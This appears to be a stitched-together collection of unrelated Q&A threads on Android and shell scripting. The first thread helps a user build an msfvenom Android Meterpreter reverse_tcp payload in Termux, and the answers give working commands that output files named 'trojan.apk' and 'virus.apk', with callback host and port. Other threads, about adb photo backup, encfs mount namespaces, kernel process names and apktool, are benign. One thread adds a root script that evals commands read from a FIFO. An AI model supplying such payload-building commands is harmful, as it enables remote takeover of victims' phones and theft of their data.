When I make a payload with this command in my termux app
. /msfvenom -p android/meterpreter/reverse_tcp lhost=IP ADDRESS lport=3333 -o /sdcard/FILE NAME/test.apk
Then it is showing me
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 9435 bytes
Error: Permission denied # rb_sysopen - /sdcard/apk_payload/hack.apk
How to solve it please please 🙏 please help me
First of all, sorry for my bad english.
It looks like your problem is the path, the sdcard path is ~/storage
And inside, you just can access some folders, in my case are dcim, downloads, movies, music, pictures & shared
I've decided to put it in downloads, so the path should look like this:
~/storage/downloads/trojan.apk
The final code should be like this:
./msfvenom -p android/meterpreter/reverse_tcp LHOST=Your Ip LPORT=Your Port -o ~/storage/downloads/trojan.apk
First if msfvenom is in your usr/local/bin folder you should not need ./msfvenom just start with msfvenom.
Second the -o option is used when the -x option is used otherwise you should not use it.
Your command should look like this
msfvenom -p android/meterpreter/reverse_tcp LHOST=your ip LPORT=your port R > /root/what-ever-path-you-want/app-name.apk
Example:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.19 LPORT=4444 R > /root/Documents/virus.apk
Related
Story
I take photos and record videos with my phone camera and keep all of them on my internal storage/sdcard. I periodically back them up on my PC, so I keep these camera photos on PC storage in sync with phone storage.
For years, I've been backing up my phone camera photos to my PC in the following way:
Plug in phone into PC and allow access to phone data
Browse phone storage → DCIM → Camera
Wait several minutes for the system to load a list of ALL photos
Copy only several latest photos which haven't been backed up yet
I figured that waiting several minutes for all photos to load is an unnecessary drag so I downloaded adb platform tools. I've added the folder bin to my Path environment variable (i.e. %USERPROFILE%\Tools\adb-platform-tools_r28.0.3) so that I can seamlessly use adb and not write its full path each time.
The script
I wrote the following script for Git Bash for Windows. It is also compatible with Unix if you change the $userprofile variable. Essentially, the script pulls camera photos between two dates from phone storage to PC.
# Attach device and start deamon process
adb devices
# Initialize needed variables
userprofile=$(echo "$USERPROFILE" | tr "\\" "/") # Windows adjustments
srcFolder="//storage/06CB-C9CE/DCIM/Camera" # Remote folder
dstFolder="$userprofile/Desktop/CameraPhotos" # Local folder
lsFile="$dstFolder/camera-ls.txt"
filenameRegex="2019061[5-9]_.*" # Date from 20190615 to 20190619
# Create dst folder if it doesn't exist
mkdir -p "$dstFolder"
# 1. List contents from src folder
# 2. Filter out file names matching regex
# 3. Write these file names line by line into a ls file
adb shell ls "$srcFolder" | grep -E "$filenameRegex" > "$lsFile"
# Pull files listed in ls file from src to dst folder
while read filename; do
if [ -z "$filename" ]; then continue; fi
adb pull "$srcFolder/$filename" "$dstFolder" # adb: error: ...
done < "$lsFile"
# Clean up
rm "$lsFile"
# Inform the user
echo "Done pulling files to $dstFolder"
The problem
When I run the script (bash adb-pull-camera-photos.sh), everything runs smoothly except for the adb pull command in the while-loop. It gives the following error:
': No such file or directoryemote object '//storage/06CB-C9CE/DCIM/Camera/20190618_124656.jpg
': No such file or directoryemote object '//storage/06CB-C9CE/DCIM/Camera/20190618_204522.jpg
': No such file or directoryemote object '//storage/06CB-C9CE/DCIM/Camera/20190619_225739.jpg
I am not sure why the output is broken. Sometimes when I resize the Git Bash window some of the text goes haywire. This is the actual error text:
adb: error: failed to stat remote object '//storage/06CB-C9CE/DCIM/Camera/20190618_124656.jpg': No such file or directory
adb: error: failed to stat remote object '//storage/06CB-C9CE/DCIM/Camera/20190618_204522.jpg': No such file or directory
adb: error: failed to stat remote object '//storage/06CB-C9CE/DCIM/Camera/20190619_225739.jpg': No such file or directory
I am sure that these files exist in the specified directory on the phone. When I manually execute the failing command in bash, it succeeds with the following output:
$ adb pull "//storage/06CB-C9CE/DCIM/Camera/20190618_124656.jpg" "C:/Users/User/Desktop/CameraPhotos/"
//storage/06CB-C9CE/DCIM/Camera/20190618_124656.jpg: 1 file pulled. 15.4 MB/s (1854453 bytes in 0.115s)
The question
I can't figure out what's wrong with the script. I thought the Windows system might be causing a commotion, because I don't see the reason why the same code works when entered manually, but doesn't work when run in a script. How do I fix this error?
Additional info
Note that I had to use // in the beginning of an absolute path on Windows because Git Bash would interpret / as its own root directory (C:\Program Files\Git).
I've echoed all variables inside the script and got all the correct paths that otherwise work via manual method.
camera-ls.txt file contents
20190618_124656.jpg
20190618_204522.jpg
20190619_225739.jpg
Additional questions
Is it possible to navigate to external sdcard without using its name? I had to use /storage/06CB-C9CE/ because /sdcard/ navigates to internal storage.
Why does tr "\\" "/" give me this error: tr: warning: an unescaped backslash at end of string is not portable?
Windows batch script
Here's a .bat script that can be run by Windows Command Prompt or Windows PowerShell. No Git Bash required.
:: Start deamon of the device attached
adb devices
:: Pull camera files starting from date
set srcFolder=/storage/06CB-C9CE/DCIM/Camera
set dstFolder=%USERPROFILE%\Desktop\CameraPhotos
set lsFile=%USERPROFILE%\Desktop\CameraPhotos\camera-ls.txt
set dateRegex=2019061[5-9]_.*
mkdir %dstFolder%
adb shell ls %srcFolder% | adb shell grep %dateRegex% > %lsFile%
for /F "tokens=*" %%A in (%lsFile%) do adb pull %srcFolder%/%%A %dstFolder%
del %lsFile%
echo Done pulling files to %dstFolder%
Just edit the srcFolder to point to your phone camera folder,
plug a pattern into the dateRegex for matching the date interval and
save it as a file with .bat extension, i.e: adb-pull-camera-photos.bat.
Double-click the file and it will pull filtered photos into CameraPhotos folder on Desktop.
Keep in mind that you still need have adb for Windows on your PC.
The problem was with Windows line delimiters.
Easy fix
Just add the IFS=$'\r\n' above the loop so that the read command knows the actual line delimiter.
IFS=$'\r\n'
while read filename; do
if [ -z "$filename" ]; then continue; fi
adb pull "$srcFolder/$filename" "$dstFolder"
done < "$lsFile"
Explanation
I tried plugging the whole while-loop into the console and it failed with the same error:
$ bash adb-pull-camera-photos.sh
List of devices attached
9889db343047534336 device
tr: warning: an unescaped backslash at end of string is not portable
': No such file or directoryemote object '//storage/06CB-C9CE/DCIM/Camera/20190618_124656.jpg
': No such file or directoryemote object '//storage/06CB-C9CE/DCIM/Camera/20190618_204522.jpg
': No such file or directoryemote object '//storage/06CB-C9CE/DCIM/Camera/20190619_225739.jpg
Done pulling files to C:/Users/User/Desktop/CameraPhotos
This time I started investigating why the output was broken. I remembered that windows uses \r\n as newline, which means Carriage Return + Line Feed, (CR+LF), so some text must have been overwritten.
It was because of broken values stored inside the $filename variable.
This is the loop from the script:
while read filename; do
if [ -z "$filename" ]; then continue; fi
adb pull "$srcFolder/$filename" "$dstFolder"
done < "$lsFile"
Since each iteration of the while-loop reads a line from $lsFile in the following form:
exampleFilename.jpg\r\n
It misinterprets the newline symbols as part of the file name, so adb pull tries to read files with these whitespaces in their names, but fails and it additionally writes a broken output.
Adb Photo Sync
This might not be the answer but might be useful for others looking for android photo/files backup solution.
I use this script on my Windows with git bash. This can be easily used for Linux. A common issue with a long backup process is that it might get interrupted and you might have to restart the entire copy process from start.
This script saves you from this trouble. You can restart the script or interrupt in between but it will resume copy operation from the point it left.
Just change the rfolder => android folder, lfolder => local folder
#!/bin/sh
rfolder=sdcard/DCIM/Camera
lfolder=/f/mylocal/s8-backup/Camera
adb shell ls "$rfolder" > android.files
ls -1 "$lfolder" > local.files
rm -f update.files
touch update.files
while IFS= read -r q; do
# Remove non-printable characters (are not visible on console)
l=$(echo ${q} | sed 's/[^[:print:]]//')
# Populate files to update
if ! grep -q "$l" local.files; then
echo "$l" >> update.files
fi
done < android.files
script_dir=$(pwd)
cd $lfolder
while IFS= read -r q; do
# Remove non-printable characters (are not visible on console)
l=$(echo ${q} | sed 's/[^[:print:]]//')
echo "Get file: $l"
adb pull "$rfolder/$l"
done < "${script_dir}"/update.files
My command is:
./msfvenom -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=443 -o > ~/storage/itechhacks.apk
But it wants below details:
[-] No platform was selected, choosing Msf::Module::Platform::Android
from the payload [-] No arch selected, selecting arch: dalvik from the
payload No encoder or badchars specified, outputting raw payload
Payload size: 10075 bytes
You can specify an architecture with -a or --arch, a platform with --platform, encoder with -e and badchars with -b.
You get more help with --help or -h
To list available arch, encoders... etc use --list arch, --list encoders ...etc
And you may want to specify the format with -f to get a .apk file and don't use > with -o
Depending on the msfvenom version the commands may differ slightly, use -h or --help to get the right syntax.
Here is a good description of msfvenom: https://www.offensive-security.com/metasploit-unleashed/Msfvenom/
I want to create a encrypting filesystem by encfs(Android's FDE or FBE can't encrypt single directory),but it doesn't work well when I execute the command by local shell(JuiceSSH):
encfs --no-default-flags --public --stdinpass /data/home/MediaStore-e /data/media/0/MediaStore -- -o uid=1023,gid=1023,umask=002 #1023 is media_rw's ID
Only JuiceSSH can access the /data/media/0/MediaStore what I want instead of the old directory(in other words,the true MediaStore).And the other applications(not only Java applications,and also adb etc.) don't think it is a mountpoint:
adb shell
shell#oneplus3:/ $ su
shell#oneplus3:/ # mountpoint /data/media/0/MediaStore
shell#oneplus3:/ # /data/media/0/MediaStore is not a mountpoint
In local shell(JuiceSSH):
oneplus3 ~ # mountpoint /data/media/0/MediaStore
oneplus3 ~ # /data/media/0/MediaStore is a mountpoint
And /system/bin/sdcard(the application which provides /storage/emulated/) can't access it,so I can't read my data from /storage/emulated/0/MediaStore.
But If I execute the command above by adb,it will work well.
I use this script to find the processes which know the directory is a mountpoint:
for dir in /proc/*;do
if [ -e $dir/mounts ];then
if grep -q MediaStore $dir/mounts;then
cat $dir/cmdline
echo
fi
fi
done
When I run encfs --no-default-flags --public --stdinpass /data/home/MediaStore-e /data/media/0/MediaStore -- -o uid=1023,gid=1023,umask=002 by local shell,the script print this:
com.sonelli.juicessh
/data/user/0/com.sonelli.juicessh/files/bin/arm/pie/bash--rcfile/data/user/0/com.sonelli.juicessh/files/share/bashrc
su0-c/data/data/com.sonelli.juicessh/files/bin/arm/pie/bash--rcfile/data/home/.bashrc
/data/data/com.sonelli.juicessh/files/bin/arm/pie/bash--rcfile/data/home/.bashrc
/data/bin/encfs--no-default-flags--public--stdinpass/data/home/MediaStore-e/data/media/0/MediaStore---ouid=1023,gid=1023,umask=002
When I do that by adb,it prints so many lines that I can't put them here,but almost all processes are in them.And other applications (such as music player)can access the data what I want.
The adb shell and local shell run as the same user and group,and own the same secure context(u:r:su:s0),I even tried to clear environment variables,and setenforce 0,I got the same result as before.How can I fix it?I can't use adb to do it every time I reboot.
I have solved this problem by myself,so I answer myself question to share my solution.
This reason why other processes can't access the mount tree what I want is than they are in different mount namespace.ADB's name space is same as /sbin/init,but JuiceSSH(or other terminal application created by zygote64) is in another mount namespace create by clone(2),so you can't access the mount tree by other application even as root.
Solution:
1.
If your su supports --mount-master option,just use it.
2.
Write a shell script which was executed by /system/bin/sysinit * on boot,so it is in the same mount namespace as init(1).It read commands from a FIFO and excute it.It is like this:
#!/system/bin/sh
mknod /data/.global_fifo p
while true;do
eval "$(cat /data/.global_fifo)"
done
Don't forget set correct mode and secure context for it.
sysinit is a application,it execute /system/etc/init.d/* just like most of linux distribution,it was installed on cyanogenmod 13.0.You can write one by yourself and add it into /init.rc.)
I am working on one project requires obtaining the complete app package name inside kernel mode. I realized the package name is also the process name inside kernel. However, the task_struct->comm (process name) can only give me 15 characters long.
Also, fs/proc/base.c proc_get_cmdline() can return the full process name but it is private function. I try to export proc_get_cmdline() to public and invoke from my loadable kernel module, but it always crash when I invoke the public proc_get_cmdline().
Is there any way I can get the complete package name inside kernel? Like read from proc/pid/cmdline, read from mm_struct, etc. Appreciate any code example.
You are not supposed to call proc_pid_cmdline().
It is a non-public function in fs/proc/base.c:
static int proc_pid_cmdline(struct seq_file *m, struct pid_namespace *ns,
struct pid *pid, struct task_struct *task)
However, what it does is simple:
get_cmdline(task, m->buf, PAGE_SIZE);
That is not likely to return the full path though and it will not be possible to determine the full path in every case. The arg[0] value may be overwritten, the file could be deleted or moved, etc. A process may exec() in a way which obscures the original command line, and all kinds of other maladies.
A scan of my opensuse 12.3 system /proc/*/cmdline turns up all kinds of less-than-useful results:
/proc/1/cmdline
/sbin/init showopts
/proc/10/cmdline
/proc/11/cmdline
/proc/1163/cmdline
/sbin/dhclient6 -6 -cf /var/lib/dhcp6/dhclient6.eth0.conf -lf /var/lib/dhcp6/dhclient6.eth0.lease -pf /var/run/dhclient6.eth0.pid -q eth0
/proc/12/cmdline
/proc/13/cmdline
/proc/14/cmdline
/proc/15/cmdline
/proc/16/cmdline
/proc/17/cmdline
/proc/1710/cmdline
/sbin/dhcpcd --netconfig -L -E -HHH -c /etc/sysconfig/network/scripts/dhcpcd-hook -t 0 -h del1-dhp-32429 eth0
/proc/172/cmdline
/proc/185/cmdline
/proc/186/cmdline
/proc/187/cmdline
/proc/19/cmdline
/proc/2/cmdline
/proc/20/cmdline
/proc/21/cmdline
/proc/22/cmdline
/proc/23/cmdline
/proc/25/cmdline
/proc/254/cmdline
/proc/255/cmdline
/proc/26/cmdline
/proc/2671/cmdline
/usr/lib/upower/upowerd
/proc/2674/cmdline
/usr/lib/polkit-1/polkitd --no-debug
/proc/27/cmdline
/proc/2727/cmdline
/usr/lib/udisks2/udisksd --no-debug
/proc/28/cmdline
/proc/285/cmdline
/usr/lib/systemd/systemd-journald
/proc/286/cmdline
/proc/288/cmdline
/proc/29/cmdline
/proc/2913/cmdline
/usr/sbin/cron -n
/proc/2924/cmdline
/usr/sbin/sshd -D
/proc/3/cmdline
/proc/3023/cmdline
/usr/lib/postfix/master
/proc/3090/cmdline
pickup -l -t fifo -u
/proc/3091/cmdline
qmgr -l -t fifo -u
/proc/31/cmdline
/proc/311/cmdline
/usr/lib/systemd/systemd-udevd
/proc/3132/cmdline
/usr/lib/vmware/bin/vmware-vmblock-fuse -o subtype=vmware-vmblock,default_permissions,allow_other /var/run/vmblock-fuse
/proc/3168/cmdline
/usr/sbin/vmware-authdlauncher
/proc/32/cmdline
Works for me in openSUSE 12.3:
for I in /proc/*/cmdline; do echo $I; cat $I | tr '\000' ' '; echo; done
I am trying to write a bash script that decompiles several .apk files using apktool. Each apk file is located in a subdirectory of the sample folder.
#!bin/bash
for item in $(ls samples);
do
for apk in $(ls "samples/$item");
do
echo ./apktool/apktool d "./samples/$item$apk"
$(./apktool/apktool d "./samples/$item$apk")
done
done
When I run the script I get the following output:
./apktool/apktool d ./samples/ADRD/53dc.apk*
Input file (./samples/ADRD/53dc.apk*) was not found or was not readable.
The input file error message is the standard for when apktool cannot find a file. However, if I run the following command in the terminal the apktool will work correctly.
./apktool/apktool d ./samples/ADRD/53dc.apk*
I have changed the permissions of all the files located in the samples folder to rw for all users. I also have tried using sudo with the shell script, but this causes the script to hang. However, when I use sudo with the apktool in the command line it also hangs. Therefore, I am not sure if using sudo with apktool is doable.
Any help is appreciated, thanks.
So it looks like this ls gives you an output with an asterisk * appended at the end of the apk filename, because the file is executable.
for apk in $(ls "samples/$item");
This is not the default behaviour of ls, you are getting this probably because you have aliased ls to ls -F or similar. To bypass the alias, rewrite the line this way:
for apk in $(\ls "samples/$item");
Notice the \ I added there.
BTW, is it normal that an apk file is executable? Perhaps you can remove the executable bit:
find samples -name '*.apk' -exec chmod -x {} \;
Also, possibly your script can be replaced with this one liner:
find samples -name '*.apk' -exec ./apktool/apktool d {} \;
Mind you, this is not exactly the same thing, because it may go deeper than two directories. If you need to limit the depth, that's possible too, see man find